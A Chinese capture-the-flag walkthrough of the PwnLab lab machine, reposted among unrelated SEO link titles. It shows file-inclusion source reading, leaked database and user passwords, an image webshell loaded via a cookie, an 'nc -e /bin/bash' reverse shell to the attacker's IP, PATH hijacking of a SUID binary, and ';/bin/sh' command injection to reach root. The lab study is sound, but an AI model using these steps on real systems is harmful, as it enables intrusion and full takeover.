当前位置: 首页 > news >正文

网站优化seo是什么个人或主题网站建设 实验体会

网站优化seo是什么,个人或主题网站建设 实验体会,五个网络营销方式,深圳网站设计教程pwnlab通关 关于文件包含,环境变量劫持的一个靶场 信息收集 靶机ip:192.168.112.133 开放端口 根据开放的端口信息决定从80web端口入手 目录信息 在images和upload路径存在目录遍历,config.php被渲染无法查看,upload.php需…

pwnlab通关

关于文件包含,环境变量劫持的一个靶场

信息收集

靶机ip:192.168.112.133

开放端口
在这里插入图片描述

根据开放的端口信息决定从80web端口入手

目录信息

在这里插入图片描述

在images和upload路径存在目录遍历,config.php被渲染无法查看,upload.php需要先登录才能访问,尝试先从登录login.php界面入手

渗透阶段

访问

http://192.168.112.133

在这里插入图片描述

点击login,路径变为

http://192.168.112.133/?page=login

在这里插入图片描述

再访问下login.php

http://192.168.112.133/login.php

在这里插入图片描述

很明显的文件包含,利用php文件流进行读取,再进行base64解码

index.php

http://192.168.112.133/?page=convert.base64-encode/resource=index

在这里插入图片描述

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?phpif (isset($_GET['page'])){include($_GET['page'].".php");}else{echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>

config.php

http://192.168.112.133/?page=convert.base64-encode/resource=config

在这里插入图片描述

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

upload.php

http://192.168.112.133/?page=convert.base64-encode/resource=upload

在这里插入图片描述

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php 
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename  = $_FILES['file']['name'];$filetype  = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext  = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');}}
}?>

在config.php中直接拿到了mysql的用户名密码,直接连接

在user表中拿到了3个用户及密码,密码经过base64加密

在这里插入图片描述

解密后

kent JWzXuBJJNy
mike SIfdsTEn6I
kane iSv5Ym2GRo

有了账号密码后直接在登录页面进行登录,登录后会显示文件上传界面

在这里插入图片描述

发包拦截,对upload.php进行代码审计发现经过了后缀白名单,mime类型等一些校验导致无法进行后缀绕过。只能上传图片马,想通过文件包含的方式getshell,但是在之前index.php页面中的include是这样的,如果包含的是xxx.jpg最后会被拼接成xxx.jpg.php文件不存在

if (isset($_GET['page'])){include($_GET['page'].".php");}

但在index.php中发现了另一个文件包含,可以利用Cookie进行getshell

if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}

首先绕过检测上传图片马,得到路径

在这里插入图片描述

蚁剑连接,在header中设置cookie的lang字段

在这里插入图片描述

在这里插入图片描述

成功getshell

由于蚁剑是半交互式的,防止后面提权可能会用不了直接shell reverse到本机

这里采用nc工具,本机监听7777端口

nc -lvvp 7777

蚁剑窗口

nc -e /bin/bash 192.168.112.130 7777

反弹成功

在这里插入图片描述

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash");'

在这里插入图片描述

提权阶段

当前用户为www-data,查找当前用户可提权的suid命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

没有可以利用的,切换用户kent没找到

su kent

切换mike,不让登录

su mike

在这里插入图片描述

登录kane

su kane

还是查找suid命令,在kane的用户目录下找到了一个可执行文件

在这里插入图片描述

cd到该目录下进行查看,是一个ELF文件

在这里插入图片描述

strings msgmike

在这里插入图片描述

在msgmike中发现了一条cat语句

cat /home/mike/msg.txt

我们利用环境变量进行劫持cat

在/home/kane目录下新建cat,给予执行权限,写入反弹,更改环境变量

touch cat
chmod +x cat
echo "/bin/sh" > cat
export PATH=/home/kane:$PATH

这样执行msgmike执行到cat语句会直接反弹到更高的权限

./msgmike

在这里插入图片描述

继续进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash");'

在mike用户下查找可执行的suid命令,在mike用户下发现了一个msg2root的可执行文件

在这里插入图片描述

cd到该目录下

strings msg2root

在这里插入图片描述

在msg2root文件中发现了一条echo命令,%s是我们写入的字符串

/bin/echo %s >> /root/messages.txt

我们直接利用;分割反弹shell

;/bin/sh

首先运行msg2root

./msg2root

在这里插入图片描述

成功提权到root

cd到root目录下查看flag

在这里插入图片描述

http://www.yayakq.cn/news/169273/

相关文章:

  • 做涉黄的视频网站用什么服务器北京互联网公司有哪些
  • 下载男女做爰免费网站免费咨询身高问题
  • 网站域名 设置淮阳网站建设
  • 网站建设的难点在哪里室内设计自学软件
  • 北京网站设计制作费用2023年第三波新冠9月
  • 网站建设的需求是什么意思外贸开发网站建设
  • 高端网站设计多少钱成都网站设计哪家好
  • 建网站空间都有什么平台wp标题 wordpress
  • visual studio 2010 网站开发教程开封府景点网站建设的目的
  • 网站建设资料总结东莞seo网站优化运营
  • 做网站生意多吗杭州网页设计公司
  • 咸阳网站制作公司西安给公司做网站
  • 装饰网站卧室做炕百度wordpress 分类文章列表
  • 网站的网络设计公司昆明网站建设有限公司
  • 哪个网站做舞蹈培训推广效果好移动网站 图片优化
  • 大同营销型网站建设费用wordpress一行多图片
  • 用dw做淘宝网站中国乐清网app
  • 深圳英文网站建设公司1免费建站网站
  • wordpress网站统计汕头网站建设
  • 六安网站制作公司排名域名能卖多少钱一个
  • 扬州做网站的中文网站怎么做英文版
  • 1元做网站方案建设个人网站用什么软件好
  • dedecms 网站搬家服务器活动
  • 宁德营销型网站建设自己做键盘的网站
  • 做网站毕业设计存在的问题网站开发投标书范本目录
  • wordpress极简模版网站主机的选择与优化
  • wordpress获取站点标题昌邑建设网站
  • 建站之星官网建设小白一步步做网站
  • 搭建网站找什么公司兰州建网站
  • 做期货要看哪几个网站赤峰建设业协会的官方网站